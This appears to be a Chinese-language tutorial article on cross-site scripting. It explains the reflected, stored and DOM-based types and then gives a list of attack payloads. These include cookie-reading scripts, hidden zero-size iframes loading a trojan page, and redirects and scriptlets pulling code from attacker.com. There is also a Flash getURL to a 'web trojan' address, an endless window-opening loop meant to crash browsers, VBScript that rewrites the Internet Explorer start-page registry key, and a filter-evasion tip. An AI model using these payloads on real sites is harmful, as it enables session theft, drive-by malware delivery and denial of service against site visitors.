一、什么是XSS?

XSS全稱是Cross Site Scripting即跨站腳本，當目標網站目標用戶瀏覽器渲染HTML文檔的過程中，出現了不被預期的腳本指令并執(zhí)行時，XSS就發(fā)生了。

二、XSS分類

XSS有三類：反射型XSS(非持久型)、存儲型XSS(持久型)和DOM XSS

反射型XSS
發(fā)出請求時，XSS代碼出現在URL中，作為輸入提交到服務器端，服務器端解析后響應，XSS代碼隨響應內容一起傳回給瀏覽器，最后瀏覽器解析執(zhí)行XSS代碼。這個過程像一次反射，故叫反射型XSS。

存儲型XSS
存儲型XSS和反射型XSS的差別僅在于，提交的代碼會存儲在服務器端（數據庫，內存，文件系統(tǒng)等），下次請求目標頁面時不用再提交XSS代碼

最典型的例子是留言板XSS，用戶提交一條包含XSS代碼的留言存儲到數據庫，目標用戶查看留言板時，那些留言的內容會從數據庫查詢出來并顯示，瀏覽器發(fā)現有XSS代碼，就當做正常的HTML與Js解析執(zhí)行，于是觸發(fā)了XSS攻擊。

DOM XSS
DOM XSS和反射型XSS、存儲型XSS的差別在于DOM XSS的代碼并不需要服務器參與，觸發(fā)XSS靠的是瀏覽器端的DOM解析，完全是客戶端的事情。

附常見的XSS攻擊方法

1、這個應該都知道
<script>alert("test")</script> 常用于測試 是否存在跨站

2、<script>window.alert(document.cookie);</script>
這句代碼將會彈出壹個包含有瀏覽者cookie信息的對話框，如果用戶已經通過帳號登陸網站，在顯示的cookie信息中將會包含有用戶的賬戶名和密碼。

3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,當用戶瀏覽該 頁時，將彈出壹個高爲200，寬爲200的網頁窗口，在其中打開的頁面是http://www.pete.cn/default.asp

4、跨站攻擊的形式是多樣的，不僅可以在網頁中插入跨站腳本代碼，而且可以在flash文件中插入跨站腳本代碼，實現跨站攻擊。由于flash文件有較高 的安全性，用戶通常對flash文件的警惕性不夠，因此用flash文件進行跨站攻擊的成功率很高。如果將這個含有跨站腳本代碼的flash文件插入到網 頁中，例如制作成網頁banner或者廣告，那么中招的用戶將更多。
flash跨站是通過在flash文件中插入動作腳本來實現的，通過在flash文件“幀”的“動作”中插入跨站腳本代碼來實現跨站攻擊，其實現方法入下：
首先運行flash文件制作工具flash8.exe，新建壹個空白的flash文檔。然后選中其中的第壹幀，進入界面下方的“動作”編輯界面，在Action Script中插入我們的跨站腳本代碼
getURL("http://網頁木馬地址", "_blank", "GET");
loadMovieNum("http://www.pete.cn/test.swf", 0);

5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
這就是 傳說中的框架 - - 膜拜吧 還有JS 也可以使用，比框架更隱蔽

6、Refresh到另壹個頁面：

<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm"> 

7、scriptlet引入另壹個頁面：

<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object> 

下面來幾段長的 但是 記住 要慎用 ！！

1、打開無數個瀏覽器窗口，直至CPU超負荷，非關機不可：

<script language="JavaScript"> 
<!-- 
while (true) 
{ 
window.open("URI"); //如果URI就是當前頁本身，那就更具破壞性。 
} 
//--> 
</script> 

2、 修改注冊表（IE 主頁）：

<script language="VBScript"> 
Set RegWsh = CreateObject("WScript.Shell") 
'設置IE瀏覽器默認頁 
RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com" 
</script> 

有時候，</script> 可以替換大小寫 來躲過過濾

我最后要說的壹句話就是“害人終害己”，切記！

到此這篇關于XSS攻擊常識及常用腳本 的文章就介紹到這了,更多相關XSS 攻擊腳本 內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持腳本之家！

最新評論